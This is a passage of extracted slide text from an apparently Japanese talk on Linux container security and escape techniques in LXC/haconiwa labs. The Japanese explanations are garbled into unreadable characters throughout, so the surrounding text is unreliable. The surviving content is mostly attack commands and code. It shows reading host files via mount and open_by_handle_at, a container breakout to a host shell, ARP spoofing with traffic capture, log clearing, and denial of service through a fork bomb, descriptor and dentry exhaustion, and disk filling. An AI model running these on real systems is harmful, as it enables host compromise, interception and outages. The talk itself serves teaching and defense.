έΠύϏϦςΟΛମݧ͠Α͏ root@sample1:/# mount /dev/sda1 /mnt/ root@sample1:/# cat /mnt/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin … vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

Slide 112

Slide 112 text

έΠύϏϦςΟΛ%301 $ cat sample3.haco … config.capabilities.allow :all config.capabilities.drop "cap_sys_admin" config.capabilities.drop "cap_net_raw" …

Slide 113

Slide 113 text

ݖݶ͕ͳ͍ͷͰ࣮ߦෆՄೳ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 ping: icmp open socket: Operation not permitted root@sample1:/# mount /dev/sda1 /mnt/ mount: permission denied

Slide 114

Slide 114 text

TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘

Slide 115

Slide 115 text

PQFO@CZ@IBOEMF@BU wϑΝΠϧϋϯυϧ͕ࢀর͢ΔϑΝΠϧΛ։͘γεςϜίʔϧ •CAP_DAC_READ_SEARCH wϑΝΠϧͱσΟϨΫτϦͷಡΈग़͠ͷݖݶνΣοΫΛόΠύε͢Δ wCJOENPVOUͨ͠σΟϨΫτϦͱಉ͡ϑΝΠϧγεςϜʹ͋Δ೚ҙͷϑΝΠϧ ʹΞΫηεՄೳ

Slide 116

Slide 116 text

PQFO@CZ@IBOEMF@BU int open_by_handle_at( int mount_fd, struct file_handle *handle, int flags); struct file_handle { unsigned int handle_bytes; /* Size of f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ };

Slide 117

Slide 117 text

PQFO@CZ@IBOEMF@BU struct file_handle { unsigned int handle_bytes; /* Size of f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ }; ઌ಄όΠτʹ͸։͖͍ͨϑΝΠϧͷJOPEF൪߸

Slide 118

Slide 118 text

PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8 IO Block: 4096 regular file Device: 801h/2049d Inode: 23125 Links: 1 struct my_file_handle h = { .handle_bytes = 8, .handle_type = 1, // 23125 = 5a 55 .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };

Slide 119

Slide 119 text

PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8 IO Block: 4096 regular file Device: 801h/2049d Inode: 57824 Links: 1 $ haconiwa start sample4.c root@sample1:/# vim read_passwd.c // Change ex) 57824= e1 e0 .f_handle = {0xe0, 0xe1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };

Slide 120

Slide 120 text

PQFO@CZ@IBOEMF@BU root@sample1:/# gcc read_passwd.c root@sample1:/# ./a.out root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin … vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

Slide 121

Slide 121 text

ϗετͷγΣϧΛऔΔ root@sample1:/# gcc breakout.c root@sample1:/# ./a.out $ sudo haconiwa start demo1.haco

Slide 122

Slide 122 text

εΠενʔζϞσϧ w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ w TFDDPNQ͕#ZQBTT͞Εͯ΋$BQBCJMJUZͰ๷͙

Slide 123

Slide 123 text

ίϯςφͷωοτϫʔΫ

Slide 124

Slide 124 text

$POUBJOFS/FUXPSL wLXD͸σϑΥϧτઃఆͰ͸ ϒϦοδ͕࡞੒͞ΕΔ eth0 lxdbr0 veth0 eth0 veth0 eth0 $POUBJOFS $POUBJOFS #SJEHF

Slide 125

Slide 125 text

#SJEHF/FUXPSL $ ip addr show dev lxdbr0 4: lxdbr0: mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff inet 10.152.207.1/24 scope global lxdbr0 valid_lft forever preferred_lft forever inet6 fd2e:8281:6de5:9841::1/64 scope global valid_lft forever preferred_lft forever inet6 fe80::281a:c0ff:fed1:4b28/64 scope link valid_lft forever preferred_lft forever

Slide 126

Slide 126 text

$POUBJOFS/FUXPSL wίϯςφΛϗεςΟϯά͍ͯ͠Δ ৔߹ɺΠϯλʔωοτ͔Βτϥ ϑΟοΫΛड͚Δ w΋͠ίϯςφ಺ͷϢʔβʔ͕τϥ ϑΟοΫΛ๣डͰ͖ͨΒʜʁ 4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

Slide 127

Slide 127 text

"314QPPpOH w"31ͷੑ࣭Λར༻ͯ͠ϧʔςΟϯ άΛมߋ͢Δ w"31ςʔϒϧ ΞυϨεରরද Λ ৴͡ΔࣄͰ੒Γཱ͍ͬͯΔ wԠ౴Λِ૷͢Δ͜ͱʹΑΓޡͬͨ "31ςʔϒϧΛԚછͤ͞Δ͜ͱ͕ Ͱ͖Δ 4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

Slide 128

Slide 128 text

"315BCMF vagrant@ubuntu-xenial:~$ lxc list attacker | RUNNING | 10.128.193.110 (eth0) victim | RUNNING | 10.128.193.231 (eth0) vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0 # attacker ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 # victim ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

Slide 129

Slide 129 text

ίϯςφͱૄ௨͕औΕΔ͜ͱΛ֬ೝ vagrant@ubuntu-xenial:~$ lxc exec attacker bash root@test1:~# ping 10.128.193.231 # victim ip PING 10.128.193.231 (10.128.193.231) 56(84) bytes of data. 64 bytes from 10.128.193.231: icmp_seq=1 ttl=64 time=0.070 ms ^C --- 10.128.193.231 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms

Slide 130

Slide 130 text

"314QPPpOH root@test1:~# arpspoof -t 10.128.193.231 10.128.193.1 &> /dev/null & [1] 1619 root@test1:~# arpspoof -t 10.128.193.1 10.128.193.231 &> /dev/null & [2] 1620

Slide 131

Slide 131 text

"315BCMF vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on lxdbr0 ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

Slide 132

Slide 132 text

ύέοτΛΩϟϓνϟ͢Δ root@attacker:~# tcpdump -i any -vv -w test.pcap vagrant@ubuntu-xenial:~/shared$ curl 10.128.193.231

Slide 133

Slide 133 text

औಘͨ͠ύέοτΛݟͯΈΔ $ lxc file pull attacker/root/test.pcap ./ $ tcpdump -X tcp port 80 -r test.pcap 0x0000: 4500 0082 2126 4000 3f06 8267 0a80 c101 E...!&@.?..g.... 0x0010: 0a80 c1e7 8f28 0050 ebdb f6f0 89c2 03be .....(.P........ 0x0020: 8018 00e5 985d 0000 0101 080a 001b d7cb .....].......... 0x0030: 001b d7cb 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1 0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3238 .1..Host:.10.128 0x0050: 2e31 3933 2e32 3331 0d0a 5573 6572 2d41 .193.231..User-A 0x0060: 6765 6e74 3a20 6375 726c 2f37 2e34 372e gent:.curl/7.47. 0x0070: 300d 0a41 6363 6570 743a 202a 2f2a 0d0a 0..Accept:.*/*.. 0x0080: 0d0a ..

Slide 134

Slide 134 text

ͦͷଞͷ"UUBDL4VSGBDF

Slide 135

Slide 135 text

ENFTHͷόοϑΝϦϯάݺͼग़͠ͱফڈ root@sample1:/# dmesg [ 311.470895] EXT4-fs (sda1): error count since last fsck: 28 [ 311.470928] EXT4-fs (sda1): initial error at time 1537860516: htree_dirblock_to_tree:986: inode 542086: block 1069691 [ 311.470944] EXT4-fs (sda1): last error at time 1537928843: htree_dirblock_to_tree:986: inode 278756: block 531449 … root@06399a7a8814:/# dmesg -C root@06399a7a8814:/# dmesg

Slide 136

Slide 136 text

OFHBUJWFEFOUSZͷେྔੜ੒ root@sample1:/# perl -e 'stat("/$_") for 1..100000000’ vagrant@ubuntu-xenial:~$ sudo slabtop Active / Total Objects (% used) : 4172542 / 4182249 (99.8%) Active / Total Slabs (% used) : 197606 / 197606 (100.0%) Active / Total Caches (% used) : 78 / 122 (63.9%) Active / Total Size (% used) : 790487.34K / 794654.96K (99.5%) Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME 4050564 4050564 100% 0.19K 192884 21 771536K dentry

Slide 137

Slide 137 text

'JMF%FTDSJQUPSΛେྔੜ੒ w։͚ΔϑΝΠϧσΟεΫϦϓλͷ਺ʹ͸ ্ݶ͕͋Γɺ/proc/sys/fs/file- maxͰ֬ೝͰ͖Δɻ wίϯςφͷதͷϓϩηε͕͜ͷ஋ͷ਺ ͚ͩϑΝΠϧσΟεΫϦϓλΛ։͘ͱɺ VJEΛڞ༗͍ͯ͠Δ৔߹͸ϗετଆʹ΋ Өڹ͕ੜ͡Δɻ for(i=0; i=99198; i++) { sprintf(buf, “/tmp/%d", i); int fd = open(buf, O_CREAT); if( fd == -1 ){ printf("max fd %d\n”, i); break; } } for(;;);

Slide 138

Slide 138 text

GPSLCPNC $ :(){ :|: & };: $ for i in {1..9999}; do sleep infinity & done

Slide 139

Slide 139 text

σΟεΫ༰ྔ $ fallocate -l 20g big_file • ίϯςφʹσΟεΫ༰ྔ੍ݶ͕ͳ͍৔߹͸େ͖ͳϑΝΠϧΛ࡞੒͢Δ͜ͱͰɺ ϗετͷσΟεΫ༰ྔΛѹഭͤ͞Δ͜ͱ͕Ͱ͖Δɻ $ dd if=/dev/zero of=tempfile bs=20GB count=10

Slide 140

Slide 140 text

·ͱΊ IUUQTqJDLSQ;[

Slide 141

Slide 141 text

·ͱΊ w-JOVYίϯςφ͸ෳ਺ͷηΩϡϦςΟػߏʹΑͬͯकΒΕ͍ͯΔ wεΠενʔζϞσϧʢFYTFDDPNQ͕΍ΒΕͯ΋$BQBCJMJUZ͕͋Δʣ wઃఆʹෆඋ͕͋Δͱίϯςφ͔Βϗετɺଞͷίϯςφ΁ӨڹΛٴ΅͢ w-9$΍%PDLFSͳͲ͸σϑΥϧτͰ͜ΕΒͷ߈ܸΛ๷͙ઃఆΛࢪ͍ͯ͠Δ w΋͔ͨ͠͠Βෆඋ͕͋Δ͔΋Ͷ w$7&

Slide 142

Slide 142 text

܅΋ϖύϘͰಇ͔ͳ͍͔ʁ ࠷৽ͷ࠾༻৘ใΛνΣοΫˠ !QC@SFDSVJU